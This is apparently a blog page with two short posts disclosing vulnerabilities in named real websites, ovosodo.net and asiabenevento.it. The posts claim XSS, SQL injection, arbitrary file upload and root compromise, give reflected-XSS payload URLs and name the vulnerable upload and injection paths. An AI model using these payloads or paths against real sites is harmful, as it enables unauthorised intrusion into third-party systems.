Skip to main content

Posts

Showing posts with the label remote administration

www.ovosodo.net | Flash XSS - Sql Injections - possible upload of scripts - administrator privileges escalation (system compromise)

(they are not working anymore - check webcaches) www.ovosodo.net xss in the requests (simple) Sql injection (there's no need to write the injection string ... it's very simple) http://www.ovosodo.net/area_clienti.asp after *login* it's possible to upload anything that will be available in http://www.ovosodo.net/images/upload/originali/

http://www.asiabenevento.it | xss, arbitrary file upload, sql injection, remote administration, root compromise

-XSS- http://www.asiabenevento.it/asiastrade/strade.php?vcercaStra=" onmouseover=alert("xss") bla=" http://www.asiabenevento.it/vedifoto.php?foto=immagini/ASIAalta.jpg&vDidascalia=&vTitolo=1%3Cscript%3Ealert%281%29;%3C/script%3E -sql inj- http://www.asiabenevento.it/asiastrade/strade.php -arbitrary file upload- http://www.asiabenevento.it/fckeditor/